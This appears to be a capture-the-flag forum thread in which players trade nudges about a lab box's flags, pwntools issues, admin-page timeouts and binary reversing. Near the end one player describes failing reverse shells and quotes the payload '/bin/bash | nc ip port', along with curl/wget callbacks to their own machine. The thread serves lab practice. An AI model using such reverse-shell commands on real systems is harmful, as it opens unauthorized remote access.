edit: nvm, being stupid.
Type your comment> @fr0ster said:
Guys, if you add your public key into authorized_keys don’t erase all that was there!
+1
NVM: I was blind
NVM: I was blind
i am stuck at digging in… can you help me in this with nudges
Type your comment> @r061nh00d said:
i am stuck at digging in… can you help me in this with nudges
Mate, look at the open ports and “dig” on one of them
You should get something new, then it should be easy to find the flag
going deeper clue
anyone can help me for overflown question?
i cant get success with my exploit on local (note: im beginner on pwn and re)
i can send my exploit on discord, sh4d0wless#6154
I stuck with bypass authentication, I tried many attempts to bypass but couldn’t get through.
Could you anyone ping me please.
I stuck with memo.
—Honestly with pwntools in this case.
I tried use pwntools, tried wroite simple script for creating note but after “Are you done? [yes/no]” I give “Which part of [yes/no] did you not understand?%” and can’t respond anything.
Cat somebody give hint how use pwntools in cases like this?—
UPD. It’s strange but after reinstall it started to work… but anyway strange
F**k, the box is floundering… admin page not available for flag #6… ? “504 Gateway Time-out”
Again:
???
504 Gateway Time-out
nginx/1.10.3 (Ubuntu)
Someone can help me to catch the 6th flag?.. I’m searching a good documentation to repair the “leak” Reversing an ELF is not my force at all… Thanks!
Type your comment> @choupit0 said:
F**k, the box is floundering… admin page not available for flag #6… ? “504 Gateway Time-out”
Again:
???
504 Gateway Time-out
nginx/1.10.3 (Ubuntu)
Hi, you’d better script the login and reverse shell process to make it work anytime
Type your comment> @daemonzone said:
Type your comment> @choupit0 said:
F**k, the box is floundering… admin page not available for flag #6… ? “504 Gateway Time-out”
Again:
???
504 Gateway Time-out
nginx/1.10.3 (Ubuntu)Hi, you’d better script the login and reverse shell process to make it work anytime
Yes, this is what I am doing but sometimes I get this error.
And do you have a good article about 6th flag?..
And do you have a good article about 6th flag?..
Maybe A journey into Radare 2 – Part 2: Exploitation – Megabeets
Type your comment> @fr0ster said:
(Quote)
Maybe A journey into Radare 2 – Part 2: Exploitation – Megabeets
Thank you @fr0ster very interesting and detailed.
Hello guys!
I’m able to make command execution, also I can to make simple TCP connect using “nc ip port”, but I can’t to get a reverse shell. I have tried every payload from pentest monkeys. Also I have tried to make curl or wget to my machine, but connection didn’t come to my machine and I see 302 code.
Could someone help me with this issue?
The only payload with some progress is “/bin/bash | nc ip port”, but shell dropping immidiately after connection
hi guy been stuck at Secret Message part now for few days need little hint please
thanks